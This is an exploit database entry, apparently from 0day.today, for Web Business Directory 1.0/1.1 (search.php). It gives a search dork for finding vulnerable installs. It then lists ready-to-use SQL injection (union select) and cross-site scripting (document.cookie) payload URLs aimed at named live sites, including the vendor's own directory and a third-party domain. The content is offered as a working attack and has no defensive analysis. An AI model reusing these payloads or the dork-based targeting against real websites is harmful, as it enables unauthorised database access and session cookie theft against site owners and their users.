Web Business Directory 1.1 (search.php) Multiple Remote Vulnerabilities

2010-03-12T00:00:00
ID 1337DAY-ID-11281
Type zdt
Reporter Moudi
Modified 2010-03-12T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =======================================================================
Web Business Directory 1.1 (search.php) Multiple Remote Vulnerabilities
=======================================================================

[»] Web Business Directory 1.0 (search.php) Multiple Remote
Vulnerabilities
==========

[»] Script: [ Web Business Directory 1.0 ]
[»] Language: [ PHP ]
[»] Download: [ http://www.phpdirectorysource.com/
]
[»] Team: [ EvilWay ]
[»] Dork: [ Copyright 2005-2006
phpDirectorySource, all rights reserved ]
[»] Price: [ $75.00 ]
[»] Site : [ https://security-shell.ws/forum.php
]

###########################################################################


===[ Exploit SQL INJECTION + LIVE : vulnerability ]===

[»] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st=

[»]
http://www.phpdirectorysource.com/directory/search.php?sa=site&sk=a&nl=11&s
t=XX' union select version()/*
[»] http://ilovealbertaoil.com/search.php?sa=site&sk=a&nl=11&st=XX'
union select version()/*

===[ Exploit XSS + LIVE : vulnerability ]===

[»] http://www.site.com/patch/search.php?sa=site&sk=a&nl=11&st=

[»]
http://www.phpdirectorysource.com/directory/search.php?sa=site&sk=a&nl=11&s
t="><script>alert(document.cookie);</script>
[»]
http://ilovealbertaoil.com/search.php?sa=site&sk=a&nl=11&st="><script>alert
(document.cookie);</script>


Author: Moudi



#  0day.today [2018-04-09]  #